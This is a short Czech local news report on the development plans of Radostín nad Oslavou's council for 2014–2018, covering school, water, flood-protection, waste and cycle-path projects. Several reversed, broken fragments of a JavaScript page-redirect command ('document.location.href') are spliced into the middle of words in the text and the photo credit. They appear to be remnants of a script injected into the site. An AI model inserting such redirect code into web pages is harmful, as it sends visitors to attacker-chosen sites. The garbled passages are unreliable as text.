Radostín nad Oslavou
Rainbow page separator

V Radostíně naplánovali další rozvojové akce

Čtvrtek, 20. listopadu 2014

Radostín nad Oslavou

Radostín nad Oslavou / Akce na další čtyři roky naplánovali noví radostínští zastupitelé. Řada z nich se týká stavebních úprav, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak s pomocí dotačních titulů, tak v režii obce. Jedná se zejména o rozšíření infrastruktury a vzdělávání ve škole a školce, rekonstrukci vodojemu a části čistírny odpadních vod, úpravu náměstí a chodníků, opravu elektroinstalace ve škole, zateplení fasády a výměnu oken v obecním úřadě, rekonstrukci chodníku ke hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovu, vybudování záchytné nádrže na přívalovou vodu nad rybníkem Benýšek, protipovodňová opatření v lokalitě Tři Kříže a další akce. V následujícím čtyřletém období by v Radostíně měl vzniknout také sběrný dvůr na tříděný komunální odpad, přibýt další stromy a zeleň a děti v místní části Zahradiště se mohou těšit na nové hřiště.
V plánu je rovněž příprava projektů k využití možnosti spolufinancování akcí pomocí evropských i státních dotačních titulů, například při výstavbě cyklostezky mezi Radostínem nad Oslavou a Ostrovem nad Oslavou a Radostínem nad Oslavou a Kněževsí.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: www.radostinnadoslavou.cz